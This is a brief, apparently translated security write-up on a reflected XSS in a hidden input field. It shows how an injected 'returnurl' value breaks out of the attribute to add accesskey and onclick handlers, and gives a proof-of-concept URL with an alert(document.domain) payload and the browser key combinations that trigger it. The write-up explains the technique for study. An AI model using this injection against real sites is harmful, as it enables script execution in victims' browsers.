I saw an XSS vulnerability today. The insertion point is in a tag with the hidden
attribute . The input
general situation is as follows:
<input type="hidden" name="returnurl" value="[USER INJECT]" />
The normal XSS should be:
http://victim/?value=” onclick=”alert(document.domain)
But here because this input
is not displayed on the page, the commonly used onclick
method cannot be used (how to trigger onclick if you can't click on this tag...), but there is also a fun attribute in the browser called accesskey
so construct:
<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />
The PoC is:
http://victim/?returnurl=” accesskey=”X” onclick=”alert(document.domain)
Different browsers have different triggering methods. The following is the summary of w3school :
So the above XSS triggering method is:
FF: shift+alt+X (successful test)
Chrome: alt+X (the latest version of Chrome has not tested successfully)
IE: alt+X (untested success)